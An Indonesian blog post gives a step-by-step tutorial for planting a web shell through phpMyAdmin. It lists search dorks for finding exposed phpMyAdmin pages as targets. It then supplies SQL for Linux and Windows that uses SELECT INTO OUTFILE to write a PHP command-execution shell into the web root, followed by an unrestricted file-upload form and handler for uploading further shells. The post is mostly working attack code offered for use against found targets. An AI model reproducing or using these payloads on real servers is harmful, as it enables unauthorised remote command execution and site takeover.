Minggu, 03 November 2013

0 CARA Upload Shell Lewat PhpMyAdmin

09.19 Under From Unknown
[0 Comment]
dork:
inurl:/security/security.php
inurl:/phpmyadmin/index.php
dll gunakan logikanya aja...

kalo udah ketemu targetnya kita mulai:

UPDATE:

Ane juga pernah nyobain di localhost
PhpMyAdmin yang ane pakai bawaan dari LAMPP (Linux) yaitu versi 3.2.4

Langsung aja kita buka PhpMyAdminnya, kemudian pilih menu SQL

Kemudian masukkan script SQL pada form yang tersedia :
*Untuk mesin Linux


Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_GET["cmd"]; if (!empty($cmd)) { echo "<pre>"; system($cmd); echo "</pre>"; exit; } ?>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/cmd.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

*Untuk mesin Windows
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_GET["cmd"]; if (!empty($cmd)) { echo "<pre>"; system($cmd); echo "</pre>"; exit; } ?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/cmd.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Klik Go!

Note : Jika XAMPP terinstall di direktori lain, silahkan ganti codingnya di bagian SELECT * INTO OUTFILE 'alamat htdocs nya xampp/cmd.php' from temptab;

Oke ane anggap hasilnya seperti ini :
Your SQL Query has been executed successful

Itu artinya kita udah bisa membuka file cmd.php, silahkan buka http://localhost/cmd.php?cmd=Masukkan perintah OS (Linux atau Windows)
Contoh : http://localhost/cmd.php?cmd=ls <-- ls adalah perintah untuk ngeliat isi file dan direktori di mesin Linux, kalo Windows ya pake dir.

Lanjut lagi!
Langsung aja kita buka PhpMyAdminnya, kemudian pilih menu SQL

Kemudian masukkan script SQL pada form yang tersedia :
*Untuk mesin Linux
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<form enctype="multipart/form-data" action="upload.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/form.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

*Untuk mesin Windows
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<form enctype="multipart/form-data" action="upload.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/form.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Dan kemudian Klik Go!

Ulangi lagi kita buka PhpMyAdminnya, kemudian pilih menu SQL

Kemudian masukkan script SQL pada form yang tersedia :
*Untuk mesin Linux
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "/opt/lampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "</pre>";?>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

*Untuk mesin Windows
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "C:/xampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "</pre>";?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Dan kemudian Klik Go!
Ane anggep sukses, sekarang buka http://localhost/form.php

Silahkan di upload Shellnya atau file .php, .html, .htm, .txt, dan lain sebagainya.
Read More »